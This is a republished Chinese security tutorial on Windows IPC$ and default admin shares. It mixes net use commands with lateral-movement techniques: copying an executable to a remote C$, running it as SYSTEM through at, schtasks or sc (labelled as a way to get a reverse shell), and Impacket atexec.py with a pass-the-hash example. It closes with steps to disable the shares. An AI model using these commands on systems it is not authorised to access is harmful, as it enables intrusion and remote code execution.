您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

时间:2021-09-16 12:14:23  来源:  作者:网络说安全

目录

常见共享命令

IPC$

IPC$的利用条件

1:开启了139、445端口

2:目标主机开启了IPC$共享

3:IPC连接报错

IPC空连接

空连接可以做什么?(毫无作用)

IPC$非空连接

IPC$非空连接可以做什么?

dir命令(查看文件和目录)

tasklist命令(查看进程)

at命令(计划命令,可反弹shell)

schtasks(计划任务)

Impacket中的atexec.py

关闭IPC$共享及其他共享

IPC$连接失败的原因及常见错误号

连接失败原因

常见错误号


常见共享命令

net use                               #查看本机建立的连接(本机连接其他机器)
net session                           #查看本机建立的连接(其他机器连接的本机),需要administrator用户执行
net share                             #查看本地开启的共享
net share ipc$                        #开启ipc$共享
net share ipc$ /del                   #删除ipc$共享
net share admin$ /del                 #删除admin$共享
net share c$ /del                     #删除C盘共享
net share d$ /del                     #删除D盘共享
net use * /del                        #删除所有连接


net use \192.168.10.15                   #与192.168.10.15建立ipc空连接
net use \192.168.10.15ipc$              #与192.168.10.15建立ipc空连接
net use \192.168.10.15ipc$ /u:"" ""     #与192.168.10.15建立ipc空连接


net view \192.168.10.15                  #查看远程主机开启的默认共享


net use \192.168.10.15 /u:"administrator" "root"   #以administrator身份与192.168.10.15建立ipc连接
net use \192.168.10.15 /del              #删除建立的ipc连接


net time \192.168.10.15                  #查看该主机上的时间


net use \192.168.10.15c$  /u:"administrator" "root"  #建立C盘共享
dir \192.168.10.15c$                  #查看192.168.10.15C盘文件
dir \192.168.10.15c$user             #查看192.168.10.15C盘文件下的user目录
dir \192.168.10.15c$usertest.exe    #查看192.168.10.15C盘文件下的user目录下的test.exe文件
net use \192.168.10.15c$  /del        #删除该C盘共享连接


net use k: \192.168.10.15c$  /u:"administrator" "root"  #将目标C盘映射到本地K盘
net use k: /del                                           #删除该映射

 

IPC$

IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT2000在提供了 IPC$ 共享功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(C$、D$、E$……)和系统目录共享(Admin$)。所有的这些初衷都是为了方便管理员的管理。但好的初衷并不一定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。

为了配合IPC共享工作,windows操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:Windows)等,即为ADMIN$、C$、D$、E$等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。

输入 net share 可以查看开启的共享。

 

输入 net share 可以查看开启的共享。

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

所有的共享都依赖于139或445端口。

IPC$的利用条件

1:开启了139、445端口

首先我们来了解一些基础知识:

  • SMB: (Server Message Block) Windows协议族,用于文件打印共享的服务;
  • NBT: (NETBIOS Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
  • 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现

对于win2000客户端(发起端)来说:

  • 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
  • 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。

对于win2000服务器端来说:

  • 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
  • 如果禁止NBT,那么只有445端口开放。

我们建立的IPC会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听或端口,会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,IPC会话是无法建立的。

2:目标主机开启了IPC$共享

默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(C$、D$等)和系统目录 winnt 或 windows(admin$)以及IPC$。这些共享默认是开启的。可以使用net share命令查看这些共享是否开启。

3:IPC连接报错

如果目标主机没有开放139或445端口,我们去使用IPC$连接的话,会提示找不到网络名。

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

IPC空连接

 

在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。在Windows NT中,是使用 NTLM挑战响应机制认证。传送门——> NTLM认证方式(工作组环境中)

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码)。那么建立空会话到底可以做什么呢?
利用IPC$,黑客甚至可以与目标主机建立一个空的连接,而无需用户名与密码(当然,对方机器必须开了IPC$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。建立了一个空的连接后,黑客可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果黑客能够以某一个具有一定权限的用户身份登陆的话,那么就会得到相应的权限。

建立IPC$空连接

建立IPC空连接
net use \192.168.10.15
或 net use \192.168.10.15   /u:""  ""
或 net use \192.168.10.15ipc$  /u:""  ""

 

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

空连接可以做什么?(毫无作用)

在Windows2003以后,空连接什么权限都没有,也就是说并没有太大实质的用处。有些主机的 Administrator 管理员的密码为空,那么我们可以尝试使用下面的命令进行连接,但是大多数情况下服务器都阻止了使用空密码进行连接。

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

以前建立空会话可以获取一些有用的信息,但是现在空会话的权限很低,访问都被拒了

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

IPC$非空连接

建立IPC$非空连接
net use \192.168.10.131  /u:"administrator"  "密码"

 

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

IPC$非空连接可以做什么?

  • 使用管理员组内用户(administrator或其他管理员组内用户均可)建立IPC$连接,可以执行以下所有命令。
  • 使用普通用户建立IPC$连接,仅能执行查看时间命令:net time 192.168.10.131 ,其他命令均执行不了。

dir命令(查看文件和目录)

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

也可以直接在文件管理用命令:192.168.10.131c$ 查看对应的文件及目录,也可以增删改查

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

tasklist命令(查看进程)

tasklist /S 192.168.10.131 /U administrator -P 密码

 

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

at命令(计划命令,可反弹shell)

  • 查看目标系统时间:net time 192.168.10.131
  • 将本目录下的指定文件复制到目标系统中:copy vps.exe 192.168.10.131c$
  • 使用at创建计划任务:at 192.168.10.131 17:00:00 C:vps.exe
  • 清除at记录:at 192.168.10.131 作业ID /delete
  • 使用at命令执行,将执行结果写入本地文本文件,再使用type命令查看该文件的内容:at 192.168.10.131 17:00:00 cmd.exe /c "ipconfig > C:/1.txt "
  • 查看生成的1.txt文件:type 192.168.10.131C$1.txt

 

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 


Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

schtasks(计划任务)

Windows Vista、Windows Server 2008及之后版本的操作系统已经弃用at命令,而转为用schtasks命令。schtasks命令比 at 命令更灵活。在使用schtasks命令时,会在系统中留下日志文件:C:WindowsTasksSchedLgU.txt

在目标主机上创建一个名为test的计划任务,启动程序为C:vps.exe,启动权限为system,启动时间为每隔一小时启动一次
schtasks /create /s 192.168.10.131 /tn test /sc HOURLY /mo 1 /tr c:vps.exe /ru system /f


其他启动时间参数:
/sc onlogon  用户登录时启动
/sc onstart  系统启动时启动
/sc onidle   系统空闲时启动


查询该test计划任务
schtasks /query | findstr test


启动该test计划任务
schtasks /run /s 192.168.10.131 /i /tn "test"


删除该test计划任务
schtasks /delete /s 192.168.10.131 /tn "test" /f


sc命令创建计划任务
copy test.exe \192.168.10.20c$
sc \192.168.10.20 create test binpath= "c:test.exe"
sc \192.168.10.20 start test
sc \192.168.10.20 del test
Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 


Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 


Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 


Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

Impacket中的atexec.py

Impacket中的atexec.py脚本,就是利用定时任务获取权限,该脚本的利用需要开启ipc$共享。这个脚本仅工作Windows>=Vista的系统上。这个样例能够通过任务计划服务(Task Scheduler)来在目标主机上实现命令执行,并返回命令执行后的输出结果 。

 ./atexec.py  xie/hack:x123456./@192.168.10.130  whoami
 ./atexec.py  xie/hack:@192.168.10.130  whoami  -hashes aada8eda23213c027743e6c498d751aa:b98e75b5ff7a3d3ff05e07f211ebe7a8
Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

关闭IPC$共享及其他共享

 

既然ipc$有一定的危险性,而且对于我们大多数人来说是没啥用的,所以我们执行以下命令关闭共享

1、使用命令关闭:

net  share  ipc$    /delete              关闭ipc默认共享
net  share  c$      /delete              关闭C盘默认共享
net  share  admin$  /delete              关闭admin$默认共享

 

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

 

2、修改注册表关闭

限制IPC$缺省共享:

  • HKEY_LOCAL_macHINE/SYSTEM/CurrentControlSet/Control/Lsa
  • Name:restrictanonymous
  • Type:REG_Dword
  • Value:0x0(缺省) 0x1 匿名用户无法列举本机用户列表 0x2 匿名用户无法连接本机IPC$共享 说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server。

IPC$连接失败的原因及常见错误号

连接失败原因

  • 用户名或密码错误
  • 目标主机没有开启IPC$共享
  • 不能成功连接目标主机的139、445端口
  • 命令输入错误

常见错误号

  • 错误号5:拒绝访问
  • 错误号51:Windows无法找到网络路径,及网络中存在问题
  • 错误号53:找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动,目标防火墙过滤了端口
  • 错误号67:找不到网络名,包括 lanmanworkstation 服务未启动,IPC$已被删除
  • 错误号1219:提供的凭据与已存在的凭据集冲突。例如已经和目标建立了IPC$连接,需要在删除后重新连接
  • 错误号1326:未知的用户名或错误的密码
  • 错误号1792:试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出现此情况)
  • 错误号2242:此用户的密码已经过期。

 

版权申明:内容来源网络,版权归原创者所有。除非无法确认,我们都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。谢谢!



Tags:系统安全   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Tags: 系统安全  点击:(62)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  Tags: 系统安全  点击:(86)  评论:(0)  加入收藏
针对Linux系统的一些攻击一、前言本系列文档包括三个部分,分别是《针对Linux系统的攻击》、《Linux系统安全加固》和《Linux系统入侵排查》。编写这些文档的目的,是从攻和防的...【详细内容】
2021-07-04  Tags: 系统安全  点击:(119)  评论:(0)  加入收藏
一个简单的VBScript足以让用户获得管理权限并完全绕过Windows 10上的UAC。在普华永道英国安全研究人员Wietze Beukema的最新报告中,我们了解到将近300个Windows 10可执行文...【详细内容】
2020-06-28  Tags: 系统安全  点击:(117)  评论:(0)  加入收藏
一、Linux防火墙的基础Linux的防火墙体系主要工作在网络层,针对TCP/IP数据包实时过滤和限制,属于典型的包过滤防火墙(或称为网络层防火墙)。Linux系统的防火墙体系基于内核共存:f...【详细内容】
2019-11-28  Tags: 系统安全  点击:(107)  评论:(0)  加入收藏
建设网站系统需要做的工作很多,比如架构,模板的确认,还有各个安全问题的考虑,比如漏洞,木马等问题的渗透测试。而对于渗透这个词很多人都没怎么接触过。相信最近追热播亲爱的,热爱...【详细内容】
2019-09-03  Tags: 系统安全  点击:(142)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(8)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条